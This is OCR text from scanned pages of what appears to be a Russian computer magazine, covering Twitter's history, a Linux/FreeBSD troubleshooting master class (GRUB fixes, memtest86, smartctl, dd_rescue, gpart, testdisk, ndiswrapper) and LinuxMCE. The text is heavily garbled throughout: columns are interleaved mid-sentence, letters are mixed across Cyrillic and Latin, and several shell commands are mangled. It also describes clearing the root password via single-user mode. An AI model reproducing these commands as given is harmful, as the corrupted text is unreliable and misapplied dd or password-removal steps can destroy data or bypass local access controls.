ажиотаж, когда средств КО'lмуникации S Сети через Сеть vi кто знает, возможно, Джек так и в Odeo Дорси привела заинтересованность в
и без того в избытке? Чтобы ответить на этот продолжил бы работать в этой сфере, если бы в сервисах, ориентированных на текстовые со
вопрос, стоит обратиться к истории сервиса. том же 2000-м не завел аккаунт в ЖЖ. общения - та '1 к ним тогда тоже проявляли оп
~ 078
1
!
i
ределенный интерес. Компани~ переживала не которых получается слово. Но в ходе обсуждений
лучшие времена. В видусерьезной конкуренции всплыло словечко Тwttг [от искаженного англ.
Небольшой список на рынке [тягатьс~ с тем же iTunes явно не пред «twittep> - «щебетать»]. которое определенно
ставл~лось возможным} требовались свежие не обошлось беэ влияния Flickr, но быстро при
известных идеи, проекты и. фактически, смена профиля. И жилось [к тому же. короткие SMS- номера в США,
в ходе очередного мозгового штурма, направ как правило, п~ти символьныеl. Но по оконча
и родных сердцу ленного на спасение положени~. Дорси иэложил нии тестирования открытие сервиса состо~лось
коллега м СВОЙ за мысел - создать некий сервис. по адресу Twttf.com не только из-за попытки
любого гика лич который позволил бы люд~м всегда быть в курсе, быть оригинальными. Была еще одна причина,
чем сейчас эаняты их друзья И где те находятся. горэздо более прозаическая - домен Twitter.
HocTeй' которых Джекхотел. чтобы добавление новых записей сот уже был кем-то занят.
в этот лайфстр им было максимально просты м Тем временем. дела у Odeo шли совсем плохо.
можно почитать и быстрым. поэтому делал большой упор на Уже и безтого поредевший штаткомпаниито и
в Twitter: общения. Именно позтому в будущем у Twi tteг и печенном Twitter никто пока не знал. и команда
ДжорджЛукас (режиссер, создатель одного SMS с за пасом дл~ н и ка. XOT~ сервис и запустили в работу, адевелоперы.
"Звездных Войн,,): Коллегам идея Джека пришлась подуше На со наконец. смогли "выйти из тени» и начали ак
l1ttp:! /t1Nitter.com/George_Lucas здание прототипа сервиса у Дорси и Биза Стоу тивно приглашатьтуда друэеЙ. всеми средства
на, который ранее работал стакими известными ми агитируя их пользоваться TWltter, успеха не
Нил Гейман (писатель-фантаст, сце площадками для блоггинга как Xanga и Blogger, было. Большая часть юзеров просто баловалась
нарист, автор комиксов и графических ушло порядка двух недель. Когда рабочую мо SМS-ками. не со всем пон имая. зачем и кому все
httр://t1Nittег.соm/GгеatDismаl ки. по сути. подняв ТWlttегв закрытом режиме. изменилась.Разве что, были "докупленыдве
«только для своих». Пользователей насчитыва согласные»доменного имени - адрес Тwittег.
Limor Fried АКА Lady Ada (хакер, лось не более 50 человек. и над прое кто м витала сот перешел в распоряжение Odeo. и Twtt,
приверженецОреп Sошсе Hal'dware): атмосфера секретности - предпочитали не при пережил ребрендинг, превратившись В Twitter_
lшр:/ /twittег.сош/аdаfгuit глашатьлюдей ИЭДрУI-ИХ компаний и состороны, «Откуда же деньги?». - спросишыы. Сна
давая доступ лишь избранным. По признаниям чала инвестор у проекта был всего один - за
Стивен 80ЗНЯК (специалист по вычис самих разработчиков, это было удивительное финансирование взялс~ известный бизнесмен
лительной технике, основатель Apple) : время - ты чувствуешь. что собираешьс~ изме и IТ-деятель ЭванУиль~мс. ИнтересУиль~мса к
Iшр:/ /t1Nittег.соm/stеvеwоz нить мир. но об этом еще никто не знаетi Тwittег легко объясним - во-первых, он был од
Например, Биз Стоун вспоминает. что В первые ним из сооснователей тонущей Odeo и наблюдал
Стив Джобс (СЕО и основательАрр1е выходные тестирования у него выдалс~ ужасный за развитием идеи с самого начала и изнутри.
[I1С.): уикенд - дома как раз шел ремонт, перестилали Во-вторых. именно ему мы обязаны термином
]1ttp://t1Nitter.com/Ste'TeJobs полы. и вместо отдыха намечался жуткий аврал. «блоггер» и попул~ризацией слова «блог». Эван
И в какой-то момент. во время этой неразберихи. некогда приложил руку к основанию компа н и и
Стивен Фрай (британский актер, писа подал сигнал мобильный. Посмотрев на экран Руга Labs и фактицески создал Bloggercom.
тель и драматург): телефона. Бизузнал, что Джек. тем временем, Позже. когда Руга LаЬsбыла продана компании
l1rrр://twirrег.соm/stерhепfгу отдыхал в Напе. пот~гивая вино. Стоун призна Google. Уильямс с головой окунулся в новый
ется, что имен но тогда он окончательно проник стартарп - Odeo. Нуа когда последний начал
~ .; ся этой до странного простой идеей - продол
Кевии Роуз (создатель digg.com): медленно умирать. совсем не удивительно. что
'1 httр://t1"1ittег.соm/kеviпгоsе жая заниматься своими делами. можно просто Зван оказался не против попробовать что-то
взглянуть на дисплей мобильного и узнать. че м еще. Для nомержки Twitter Уилья мс, Стоун,
Кевин Смит (режиссер, актер, сцеиа сейчас за няты друзья. Дорси и еще ряд бывших сотрудников Odeo
рист, создатель "Догмы" и «[{лерков" ): основали компанию ObvioU5 Согр.
Ьнр:/ /twitter.com/ThatKevil1Smith ИСКАЖЕННОЕ ЩЕБЕТАНИЕ
Исходно сервис планировали назватьstаt.us. ТWIТТЕR-БУМ
Джон Фавро (режиссер): Это имя тоже придумал Дорси - ему всегда Мало- помалу вставать на ноги сервис начал к
~.passwOf(]: ---1
.. I - .
\.I.y'$P.oe.lh'ISCtJl"I:::S;'II~
tll:liollousands!upi::f \"I"'tA)'CU
J." e.tr. AmuO(!..CIC<'I'I. S.rUtt'
f:tsr h.ta~ "Ьсщ! t. 8Ltt Cl10t YC.II Ms~
SI'r1lJSJ'gityollrt"~I'IoV(
fШCI'! (\IJI ~ ь.
T,••'tIf:~1
ТЕМУ ПТИЧЕК
ные» наконец-то начали «подсаживаться» на зались не готовы. Было подсчитано, что в 2007 работали. Голый костяк Тwittег«оброс» полез
Twitter, как и было задумано его создателя ми. году Twitter оставался в рабочем состоянии 98% I1ЫМИ функциями - чатом, R5S-трансляцией,
Появились первые симптомы широко рас времени, то есть набралось П04ТИ 7 полных суток постоянными ссылками на сообщения и тому по
пространенного сегодня заболевания - люди просто~. В периоды dоwпtimе по адресу Iwilter. добными необходимыми мелочами, Разумеется,
комментировали в Twitter каждый свой ша Г, согп отображалисьразнообразныекартинки с каждым нововведением интерес обществен
причем в буквальномсмысле. Один из первых на тему птиц, например,знаменитый fail whail ности к сервису только усиливался.
твитов от разработчиков оказался n ророческим. - падающий кит, которого в воздухе поддержи Наиболее значимым и заметным витком в
"О, зто будет вызывать привыкание» [oh this IS вают крохотные птички. Все зто сопровождалось популярюацииТwittег, пожалуй, стали прошло
going to Ье addictivel, - написал в марте 2006 сообщением: «Слишком многотвитовl Пожалуй годние президентские выборы в США. После
Дo~! Саголла и оказался совершенно прав. ста, подождите немного и попробуйте еще раз». того как сервис стал одним ИЗ инструментов в
Камешком, породившим настоящуюлавину, стал Сетевое сообщество, уже изрядно пристрастив предвыборной борьбе (многие политики завели
ежегодн ый фестиваль музыки, кино и интер шееся к сервису, не преминуло породить КУ4У tWltter-аккаУНТbI), серверы только каким-то
активныхтехнологий 50uth bySouthwest. Пока карикатур на данную тему. 4УДОМ не на4али снова падать. П и к активности
длилось мероприятие, шепот,ДО ЗТОПDлишь робко при шелся непосредствен но на день выборов
шелестевшийо TwitterB интернете, перешел ДЕНЬ ВЫБОРОВ посещаемость подскочила на рекордные 43%1
в быстро нарастающийгул. 5XSW - один из Пол ностью избавиться оттеХНИ4еских проблем
крупнейших музыкальных фестивалей в США, так удалось только к 2008 roAy, сделав необходимые КУПЯТ НЕ КУПЯТ
что его всегда очень красочно освеща ютв СМ И изменения ВДlЗижке и переехав на серверы Воттак незаметно мы добралисьдо нашихдней.
и, коне4НО, в Сети. Twitter же помогупроситьпро Аmаzoп 53, В целом, именно 2О08-й, стал для Можно, конечно, еще долго сыпать цифрами и
цесс "написанияпоста в блог» до макси мума, а на Twitter реша ющим годом. Сервис не только переч ислять статистические рекорды Twitter, но
SXSW оказалось немало пользователей молодого продолжилстремительныйрост, поража~ если взглянуть на картину в целом - сервис мало
сервиса. Твиттеряне-первопроходцы комменти даже собственныхсоздателей,но и вошел в изменился за последн ий год. Появился лишь ряд
ровали шоу в режиме реального времени,уСТрОИВ фазу активных перемен. Так, в свете растущей приятных дополнен ий, вроде нормального по
практически живой стриминги координировали популярностиот Obvious Согр отдел илась иска, который разработчики попросту выкупили
свои действия с помощью того же Twitter. В итоге, самостоятельная компания Twitter Iпс., которую у другой команды и прикрутили К са Йту. В штате
детище Дорси заработало на фестивале награду возглаЕИЛДжекДорси,а Obvious в зто время Twitter Inc. сейчас работает порядка 30 человек и,
«best blogging tool» и, что более важно, - рекламу. поглотила ПО4ТИ не подающая признаков жизни какни странно, они пока не стали миллионерами,
С зто го момента интерес к Tw,tter принялся расти Odeo. Примернотогда же у Twitter появились хоть их компанию и оценили в 250 миллионов
в геометрическойпрогрессии. и новые инвесторы. По некоторым прогно долларов Twitter до сих пор не монетиэировался,
Еще несколькокрупных событий 2007 года, таких зам, стоимостьсервиса с каждым годом будет если, коне4НО, не считать монетизациейнедав
как MТV М usic Awards и Apple WWDC 2007, завер возрастатьна миллиарддолларов(правда, 1'10 нее открытиеяпонскогофилиала 'NWW. twitter.jp,
шили начатое SXSW, заставив весь мирзагово други м прогнозам. через нес колько лет сервис где «все тоже самоетолько на японском и с рек
рить о TwitterKaKo новом уникальном явлении. не будет стоить ничего :IJ. Перспективный дот ламой». Был ли зто пробный шар, или поводом
Число пользователей стремительно росло ком поспешили поддержать весьма известные в действительно послужила огромная численность
всем хотелось попробовать «эту новую штуку" В Кремн иевой долине вен чурные фонды - Uпiоп японского ТЕипер-сообщества, неизвестно. Да
действии. Кделу продвижения Twitter в массы, SquагеVепtuгеs, Charles RiverVentures, Digital вать какие-либо комментарии по поводу возмож
помимо «сарафанногорадио» ПОДКЛЮ4ИЛИСЬ Garage, Spark Capital, а также инвестиционная ной схемы получения oTTwitter денег, Дорси и его
СМИ. В результате,у сервиса началисьпробле компания Bezos Expeditions, принадлежащая коллеги неторопятся.А междутем, эта проблема
мы с работоспособностью.Хоть разработчикии Джеффу Безосу - основателю Аmаzoп.соm. А не так уж проста, ведь многие юзеры пользуются
ожидали, что их детище в один прекрасный день разработчики в зто время не только супоением сторонними twittег-клиентами,минуя сайт или,
станет популярным, н О к такому безумиюока медитировали на цифры посещаемости, но и вообще, «общаются» с сервисом через SMS.
Факты
место по популярностисреди социальн ЫХ сетей чрезвычай~ые ситуации и рассматривать
[Facebook и MySpace все ещелидируютi, и су Twitter не ка к удобный инструме~т, С помощью
и цифры
масшедшая цифра годового при роста пользова которого МОЖНО быстро и оперативнодонести
телей - 1382% сsидетельствует, что в будущем у информациюдо«всея интер~ета»,то картина
него есть все шансы возглавить зтоттоп. вырисовываетсяне столь радужная Доста
точно взглянуть на списки людей, которых
ПУСТЫШКА актиsнее scero «фоловят» [от а~гл. foHow
тельный - похоже, сегодня модно и удобно быть теле8едущейОпры Уинфри, сервис струдом
ленивым. Нет, разумеется, у медали TWllter есть выдержал наплыв американскихдомохозяек.
исходящие в мире, быстрее любых СМИ. и о конти~ге~те сервиса. Само собой, интерес
помогает максимально быстро получать и ные люди есть 8езде, и я даже составила для
сортировать практически любую информацию. тебя небольшой список, кого стоит почитать,
Если приводить глобальные и наиболее яркие но все же общая тенденция не слишком
примеры, то во время террористического акта радует Читатьлайфстрим людей, которые раздутой из ничего, vo гениальным изобре
в Мумбаи, произошедшего в 2008 году, свиде педантично рапортуют отом, что выпили кофе, тением. Хотя сер8ИС и строится на давно
тели происходящего отправляли по -·80твитов позавтракали, сходили в магазин, посмотрели известных и проверенных вещах, это не
в 5 секунд, докладывая обстановку, а другие в какой-то фильм и т.п. - сомнительное удо отменяет того факта, что он может быть
зто время помогали составлять списки убитых вольствие. И таких едва ли не большинство. полезен, интересе~, а главное - очень
и раненых. Похожая ситуация сложилась и с Вданном случае ограничение в 140знаковрабо оперативен. Иметь twittег-аккаунт сегодня
рейсом 1549, который в начале 2009 года со тает скорее против TWltter. чем за. Ритм современ удобно: одно дело читать с мобильника
вершил аварийную посадку на воду реки Гуд ной жизни диктует свои условия, и зачастую чем ленту друзей в ЖЖ и совсем другое - читать
зон, в Нью-Йорке - один из очевидцев сделал компактнее подана информация, чем проще ею ле~ТУТWlttег. Из-за подобной доступности и
фото места катастрофы и отправил его в Twitter поделиться. а чем быстрее она «проглатывается». простоты микроблоги В будущем явно про
еще до того, как на место прибыли спасатели и тем лучше. Но все же краткость не всегда сестра должат пользоваться популярностью (зто не
пресса. При годился Twitter и австралийским таланта, И стиль те KC1'a а-ля SMS - без знаков значит, что они затмят собой обычные блоги
пожарным, когда в начале 2009 горела едва препинаний, с кучей сокращений, упрощений и социальные сети, а затем поработят мир,
ли не вся Австралия - с помощью сервиса и едва ли не 1337'ом, уместен далеко не всегда. ведь с появлением кино люди не перестали
население оператив~о оповещали о текущей Тwittегже, фактически, принуждает своих юзеров читать и ходить в театр, а после появление
обстановке в охваченных пламенем зо~ах> И писать именнотак, ведь на счету каждый символ. интернета не умерли печатные СМИJ. Прос t=1!,~:
подобных примеров наберется немало. Подводя итог, скажу, что, пожалуй, равно то не нужно забывать о том, что порой 140
Однако если не принимать во внимание ошибочно называть TWltlef' и пустышкой, символов недостаточно Х
РЕ
Л,
~.
Р:i:::я на осуществление тел:~изи:нного вещання Серия ТВ
I
}
•
.
N!7632 от 16.0;.2003. выдана Минпечати рф.
bl .; ~ ,
[ОГЕНИЙ «J 1М» ЗDБНИН
/ZOBNI NIi!G"4AIL.COM/
МАСТЕР-КЛАСС
ПО РЕАНИМАЦИИ
НИКСОВ
M1eToAbI борьбЫ со сбоями Linux и Free'BSD
1. Загрузка. Затертая запись М BR, забытый многих тематическихфорумах, попала в мно на зкран имя дискового раздела, содержащего
парол ь root. гочисленные FAQ и глубоко сидит в печенках каталог /boot/grub. Далее все просто:
2. Оборудование. Подвисания и самопроиз опытных пользователей. Нет в нашей стране
вольная перезагрузка ОС, паника ядра новичка в Liпuх, который бы ни разу с ней не root дисковый--раЗДGЛ
3. Винчестеры. Затертая таблица разделов, сталкивался. А междутем, решение очень про setup (fldO)
выход из строя жесткого дис ка. стое: достаточно загрузиться слюбого Linux qu.it
пользователя root. Ка«же юниксоидылюбят явившейсястроки слово поар1С и fiажатьЪ' Для утилитупvсlосk. Запусти ее с флагом '-s', чтобы
выдум ывать дJ1иfiны,' за путанные па рол и, фиксации изменений OTKpblBaeM файл/ЬооtlgгuЬ/ УЗfiать текущую частоту GPU:
а потом с успехом их забывать. и как же они grub.conf и добавляем noapic ко всем строкам,
радуются, узнав, что для восстановления па наЧИfiающимся со слова kегпеl. Если и это не =::. пvсlосk -s
роля достаточно вы пол fi ить всего два простых поможет, полностью отключаем АСРI через опцию
действия. А именно - загрузиться в однополь «acpl=off". Для FreeBSD достаТОЧfiО нажать кла Азатем СfiИЗЬ ее примерfiО на 100 МГц:
зовательском режиме и удалить па роль из базы вишу '2', когда появится меfiЮ загрузчика, а затем
пользователей с помощью KOMafiAbI vipw. зафикси ровать измеfiеfiИЯ, добавив строку «hlпt. # nvclock -п 300
В Liпuх вход в однопользовательский режим apic.Q.disabLed= 1» вlоаdеr:сопf:
осуществляется за С'1ет передачи ядру опции ВИНТЫ ПОСЫПАЛИСЬ
siпglе Выбери в grub нужный пункт меню. ~ echo "hint.apic.O.disabled=l" » Пользователисо стажем Зfiают, что диа па
суперпол ьзователя. Вы пол н и команду vi pw, системы или постоянные уходы ядра в панику удара до случаЙfiО потертой таблицы разде
сотри звездочку в поле пароля пользователя могут свидетельствовать О том, что оператив лов. В некоторых из них ВИfiчестереще можно
root. выйди из редактора и fiабери exit, fiая памятьдышитна ладаfi. Если подвисания вернуть к жизни, fiO В БОЛЬШИfiстве случаев он
Чтобы попасть в однопользовательский режим случаются с пеРИОДИЧfiОСТЬЮ раз в час или либо уже умер, либо находится в предсмертном
FreeBSD, требуется fiажать '4' в ответ fia загру тридцать минут, скорее всего, погорели только СОСТОЯfiИИ. Чтобы не попасть впросак, специ
ЗОЧfiое меню или набрать «bool-S» в KOMafiA fieKoTopbIe ячейки одной из плаfiОК. В случае алисты рекомендуют периодически проверять
fiОЙ строке загрузчика. выхода из строя всего модуля памяти ядро состоя fi ие жесткого диска, испол ьзуя утилиты
Раэработ~и ки операЦИОfiНЫХ СVoстем уже устали smartctl, предустановлен почти в любом дис
ругаться по этому поводу; ядра Liпuх и FreeBSD $ tar -czf -/src.tar.gz /usr!src &.& трибути ве Llnux, а во Free 8SD доступеfi через
содержат даже не десятки. а сотни воркзраУfiДОВ tar -xzf ··/src. tar. gz систему портов [sysu ti ls/sma rtmontools).
для материнских плат, облада ющихтакой fiепри Запустим smartctl:
ятной особенностью. Однаmочевидно. что С мо СБОЙfiые ячейки памяти вызовут коллизии
мента поступления материнской платы в продажу при сверке КОfiТРОЛЬНЫХ сумм. и архиватор без # smartctl -д /de,,/sda
и до обfiаружеfiИЯ в ней ош ибок ПРОХОДИТ какое-то замедлеfiИЯ сообщит об этом.
время, поэтому не стоит fiадеяться, что твоя Другой [более правильны]] способ проверки В появившейся на экраfiе табл и це нас Иfiтере
свежекуплен fiая бажная АSUSуже есть в ~epHЫX заключается в иСПОЛЬЗО8аfiии профеССИОfiаль суюттол ЬКО Д8е СТРОКИ: RealLocated_Sector_Ct
списках ядра. Проблемы с АС PI и ПОДКОfiТРОЛЬ fiOrO Иfiструмеfiта memtest86. Это само и Temperature_Celsius. В ПОСЛеДfiей колонке
fibIM ему Ю-АРIС могутпроявляться по-раЗfiОМУ: достаточная программа, которая нетребует первой из fiихотражеfiО количество переназна
периодические за висания ОС, неработающие операЦИОfi fiОЙ системы ,цf1Я своей работы Ofia чеНfiЫХ секторов. Зfiачеfiие, отличное от fiУЛЯ,
клавиатура и мышь, сообщеfiИЯ ядра "м P-BIOS ИЗfiачально присутствует 8 меню grub мfiОГИХ говорит о проблемах. Диск начинает сыпаться, и
bug' 8254 timer поt соппесtеd to IO-APIC", fiO чаще дистрибутивов и LiveCD Linux Просто перезаг число переназначенных секторов будеттол ько
всего «желеЗfiЫЙ бар' даето себе знать уже fia рузи маШИfiУ и 8ыбери ПУfiктменю memtest86. расти. ПослеДfiЯЯ КОЛОfiка строки Temperature_
этапе установки ОС. Инсталлятор просто входит в Проверка памяти начнется автоматически. Celsrus содержиттекущую температуру жесткого
ступор вовремя копироваfiИЯ файлов. Программа memtest86 использует множество диска, которая fie ДОЛЖfiа превышаТI> 50- ти
К счастью, зто легко обходится через ЯВfiое различных алгоритмов тестироваfiИЯ, позтому градусов [36-45 градусов - идеальные условия!
отключеfiие APIC и/ил и ACPI в ядре. Для Linux ПРО8ерка можетзатянуться fiадолго. PeKoMefi Зfiачения S.M.A R.т. - это 8сеголишь цифры.
необходимо выбрать нужный пункт меню в дую запустить memtest86 на ночь, лечь спать. которые далеко не всегда имеютсвязь С реаль
загрузчике grub, fiажать'е', добавить в КОfiец по а утром проверить, fieT ли в выводе Kpacfiblx НЫМ состоянием жесткого диска. Более того,
1;'~
ofeO: f1 а95=884 3<UP, BROADCAST ,RUNNING, SIMPLEX, MUL ТIСА5Т> теп;с О Пl1:u 1500 I .
ор1: i On5=8<VLAN-.МТU>
e1:her 00:11:d8:52;61;94
; ne! 172 .16.67.143 oe1:mask OxffffeOOO broadca51: 172.16.95.255
l'
i
GRUВВКАЧЕС~
ВЕ3АГРУ3ЧИКА
med; а: E1:he,'ne! а""05е1еС1: (100baseТX <fu11-dup1ex»
status: act:ive
р 1; рО: f1 ag5=108810<POINTOPOHIT ,SIMPLEX, MUL ПСАSТ ,NEEDSGIANT> те1: г; с О ",1:" 1500
100: f1a9s=8049<UP,LOOPBACK,RUNNING,MULТICAST>me1:r';c О m1:U 16384
;ne1:6 fe80::1%100 prefix1en 64 scopeid Ох3
;ne1:6 ;:1 pref;x1en 128
i пе1: 127. О .0.1 netma5k OxffOOOOOO
ogO: flags=88dl<UP, POINTOPOINT, RUNNING, NOARP, SIMPLEX, МULПСАSТ> те1:Г; с О rn1:" 1456
FREEBSD
;"е1: 10.103.67.143 --> 172 .16.96.1 "е1:Пlаsk O"ffffffff
- (j;ПI@10саlh051:)-(_.)
-(0:0)-> • ЗагрузчикgruЬприcyrствуетпдеревепортоп
FreeBSD. Его можно использовать вместо стандарт
РЕЗУЛЬТАТВЫЗОВА IFCONFIG БЕЗ АРГУМЕНТОВ ного bootO. Файл !boot/grub!memL.lst в этом случае
должен выглядетьпримернотак:
title FreeBSD
исследования,проведенныекомпанией Google, показали. что root (hdO,O)
в 60% процентах случаев вероятность гибели дисков никак не сhаiпlоаdеr +1
свяэана со значениями S.М.АЯ Т.. а единственный более-ме
неедостоверный показатель - зто количество переназначен
ных секторов. Но что, если дискуже почти умер, а информация ПРИЧУДЫ МИСТЕРАХ
не может быть восстановлена из-за повторяющихся ошибок За последнее время X.org стал на порядок интеллектуальнее, и
~ info чтения или перемещения головки? Тогда ГlрИ попытке коп,, проблемы с ним уже не являются серьезным препятствием. Те
• Сыплющийся, но рования файлов ядро завалит dmesg сообщен"я ми 1/0 еггог, перь Х-сервер умеет автоматически находитьустройства ввода,
еще работоспособ а кома нда ср просто возвратитошибку. Для начала следует подбирать правильные разрешение" частотуобновлен"я для
ный жесткий диск поп робовать отмонти ровать раздел и слить и нформацию с монитора. 80 многих дистрибутивах настраиватьего вообще
вполне пригоден для помощью dd на ДPYГO~I жесткий диск [здесь и далее /dev/sda не нужно, установочные скрипты сами генерируют правиль
хранения временных сыплющийся диск.ldеv/sdЬ - новый диск) ную конфигурацию. Но время ОТ времени Х-сервер дает сбо".
AaHlibIx. Для зтого Причем. зачастую виновным оказывается сам пользователь
надо потереть табли # дд if=!dev!sda of=!dev!sdb conv~noerror,sync или с"стема обновления пакетов. Если после загрузки вместо
цу разделов привычного окна лоnина ты ВИДИLIJЬ скуч ную черную консоль,
и создать новый Если кол"чеСТ80сбойныхсекторов на диске невелико.то значит, процедура запуска сервера завершиласьс ошибками.
раздел на уцелеВLIJей dd скопирует диск, заполнив проблемныеучастки нулями. Этому может быть сотня приин, начиная ОТ отсутствия необхо
части диска. После этого останется только выполнить fsck для всех фай димого драйвера и за канчивая проблемам" с каталогом /tmp.
ловых систем И жить дальше с новым д"ском. К сожалению. Самое разумное,что можно сделать - попробовать повторно
• Чтобы убрать трюк с применением dd срабатывает не всегда. В некоторых запуститьХ-сервер командой starix и посмотреТЬ,какие
загрузочный экран ситуациях диск оказы вается поврежденным настолько, что ош ибки она выдаст на экран. В большинствеслучаев этого
и увидеть процесс сбойные участки простираются на сотни тысяч ИЛИ даже оказываетсядостаточнодля диагностики проблемы, но если
инициализации LIПUХ миллионы секторов подряд! Завершения отработки dd при причины сбоя остаются загадкой. следует обратиться за более
во всей красе, удали дется ждать нескол ько дней, за которые подопытный впол не подробным разъяснением кфайлу /var/Log/Xorg.O.!og:
опции quiet и splash можетскончаться. Лучшие умы планеты советуют исполь
из строки. доступной зовать специальную утилиту dd_rescue. с помощью которой # grep ЕЕ !varl1og;Xorg.O.10g
по клавише е можно провести коп"рование диска С двух сторон. первый
в загрузчике grub. проход с начала диска, второй'- с конца. В результате на Записываялоги, Х-сервер помечает все ошибки маркером
новом диске окажется вся информация за исключением "(EEI,,, так что приведенная команда вы ведет тол ько записи,
Idev!sda !dev!sdb
сген ерирует новый конфигурацион н ый файл X.org.
Когда дис к начнет безум но шелестеть, нажм ем <Ctrl +С>, что этом случае винить следует уже не пользователя или дист
I
# dd_rescue -r -v -у 1G -1 sda.10g -о sda.bb\
графики на плечи граф"ческого ускорюеля. Выливается
!dev!sda !dev!sdb
зто в скверные показатели производительности в систе
Останавливаем процесс копирования после продолжи 2D/ЗD-ускорения В частности. этим страдает стандарт
тельного шелеста диска и отключаем умирающего. Другая Ный ПVldlа -драйвер пv. Чтобы решить п роблему. зайди
проблема - утрата табли цы раздело в. которую еще совсем на са йт ПVld la.com и скачай последнийдрайвер для своей
недавно было принято решать с помощью шестнадцате ОС или сделай то же самое через системууправления
gpart.
mпаТЕРЯННЫЙ ДРАЙВ:ЕР
# CJpart -и !dev!sda !de'v!sda Современные версии Liпuх и FreeBSD под завязку набиты
драйверами даже для самого зкзотического оборудования.
Альтернативаgpari -. testdisk. более мощная" гибкая про Дни, когда для этих операц"онных систем приходилось
ВЫВОД PCICONF: НАС ИНТЕРЕСУЕТ ИМЯ Disk /dev/adO - 120 GB / 111 GiB - CHS 232581 16
Сuггепс parti~ion STrUCcure:
УСТРОЙСТВА, ПОЛНОЕ И СОКРАЩЕННОЕ Рагtiтiоп STarc End
- -: I • 6: ... .~
~агп; ng: Bad end'j пg head (CHS and LBA don' t macch)
.. laming; ~hort N'мJ ~,\!" sеottогQН-4Н-4S'3), iio'SU byo;t~ inst,~d QT 6fШВ. skipping... f'.rаП1iпg: Incorrect питЬег of heads/cylinder 255 (NTFS) != 16 (но)
IlIdsmn.
2 Р HPFS - NTFS 20798 7 1 31205 9 63 10490445
o:heclti"9 I:~п;tiоn.s .•.
.0
c;ili: (10В/l.50/б3)-(10нns/б))d (lO~8/1/1)·{3UОS/9/Щг
pr1l1U.ry~i'tion(3)
[ Backup
~fz:~ ~~Х~ШW~~Ы"~3~$~И~~~~14) тгу loca.e par~icion
oths: (1023/15/63)~(1~)/1516~)d (ШОS/U/l)-{3И81rJJj'58)г
ВОССТАНАВЛИВАЕМТАБЛИЦУРАЗДЕЛОВС ПОМОЩЬЮ
РЕЗУЛЬТАТ РАБОТЫ GPART TESTDISK
Сегодня LIПUХ и FreeBSD легко встают на любой COBpe~eH Проверь. загрузилсяли дра.Йвер:
ный сервер,до~ашний компьютер или лэптоп и нетребуют
специального конфигурирования. Загвоздка лишь в том. что 11- пdisитаррег -1
драйвера для «железных новинок» появляются С некоторым
каждого устройства. J.
Он будет именоваться elhO или eth 1 Запусти команду ifconf'lg для восстановлен и я
В моем при~ере слово nfeO в самом начале отражает без аргументов и найди в ее выводе зто название. Если его всего И ВСЯ - ~
имя устройства !сетевая карта) и закрепленный за ни~ нет - значит. интерфейс неактивен; если же в выводе нет ~<;_urity_qrg!wiki/
драйвер пfе. Если вместо имени ты увv!Ди шь слово «попе» строки inet - значит. ему не присвоен IP-адрес.Активиро TestDisk,
- значит, ядро не загрузило соответствующV1Й драйвер. вать интерфейс можно командой:
и пора отправляться на его поиски. Введи полное имя • Спасатель данных
устройства и название операЦV10ННОЙ системы в строку # ifconEig интерфейс inet IР-адрес пеtшаsk ddJescue - '!'L'NW.
предназначенныхдля Windows.
Твой провайдерможет V1спользоватьРРРоЕ илV1 РРТР-сер драйверов Windows
Установи naKeT пdiswгаррег. скопируй сдиска каталог с офи
вердля предоставлениядоступа к интернету. - sourceforge.n~
циальны"Драйвером для Windows. найди в нем INF-файл и
Настройка подобных подключенV1Йбыла подробно !2.ШJеСls/пdiS\Nга ррег.
выполни зту Ko~~aHДY:
описана в статье «Прорыв сквозь РРР". опубликован
ной в майс~ом номере за 2008 год. За сим я Гlрощаюсь
# ndis",rapper -i driver. inf Удачиl::I:
" "
МОИУМНЫИ
мОМ МОЯ
РЕПОСТЬ
• ПРОЕКТ LINUXMCE потребуетсяспециальныйадаптер [для ТСР! обнаружени~ движени~ в поле зрения камеры
Название LinuxMCE !,vwwliПllXmсе.Dгg] IP достаточно сетееухиl. Чтобы не запутаться используется про грамма fvlоtiоп, речь о которой
расшифровываетсякак Liпuх Media Center в одинаковых УСТРОЙСТ8ах. установленных шла в статье «Сумеречный дозор". опуБЛl1КО
EditlOn Можно с уееренностью предположить, в разных комнатах. интерфейсупраеления ванной в мартовском номерехэа 2008 год.
что этот дистрибути в позволяет n ревратить предлагает интерактивные планы помещений. Продуманный механизм сценариев поз во
обычный компьютер в современный домашний в которых пользователь может "расположить» л~ет легко объединить реакцию нескольких
развлекательный медиацентр [Ноте Theater имеющиеся девайсы по своему усмотрению. yCTpoikTB на наступление определен ного
РС. НТРС! Но наэначениеLiпuхМСЕ гораздо В качестве камер наблюдения можно исполь событияlcобытий или критериS1 [еремя суток.
шире - Ноте АutоmаtlOП System, или полно зовать обычную ееб-камеру. нолучше всегодля ден ь недели]. При этом ПОЛЬЗ0ватель получает
функциональная система автоматизации дома I этой цели подходят IP-камерbI, поддеРЖИ8аю очень гибкий механизм управлениS1 режимом
Она способна управлять всеми доступными щие различные вариантыудаленногоуправ работы системы охраны. Достаточноустано
девайсами, начиная ОТ обычного (ну. не совсем] ления. да и цена на них сегодня уже перестала вить несколько вариантов. с помощью которых
выключателя света до устройств безопасности бытьзаоблачной. Аналоговая видеокамера определить. какдействовать системе в случае
[сигнализация и видеонаблюдение), а также цепл~етс~ через плату видеозахвата. Захвачен возникновения тех или иных событий [поднять
климат-контроля и бытовых приборов. Чтобы ное изображение с любой подключенной каме тревогу, отправить SMS. позвонить на указанный
включиться 8 единую систему. УСТРОЙСТ8а р ы можно просматривать в реал ьном времени. номер и т.д.!. Есл и помещение уже имеет гото
должны уметь работать по протоколу ТСР! записывать постоянно. по заданномуусловию Byю систему охра н ы. Li пuхМСЕ способен легко
IP. X1O.INSTEON. PLCBus. EI8!KNX. Z-Wave IBpeM~. движение. 380НОК 8 дверь и т.п.! или интегрироваться и взаимодействовать с ней
или 1-Wlre. Для связи любого из нихс компом использовать комбинацию этих методов. Для Основой телефонии в LlпuхМСЕ являетсS1
работы при помощи несколько измененного устройств и сервисов -1 p-телефоны' камеры, или пультов дистанционного упра вления. Список
FreePBX I'NWW. freepbx. ого) по нятна даже проигрыватели,ТV-тюнеры и пр. Компьютер орбитеров, которые можно использовать сов
человеку, далекому oTVoIP, и не займет много Соге должен бытьдостаточномощным, - на местно с LlПuхМСЕ, приведен на страницеwiki.
времени. Для звонков с LinuxMCE на обычную его плечи 8ыпадаетсамая больша~ нагрузка linuxmce.ora/index. php/Ca legory:Orbiters. Нап ри
телефоннуюл и н ию понадобитсяАТА- адаптер по обработке данных. Должно быть достаточно мер, в качестве мобильногоорбитераподойдут
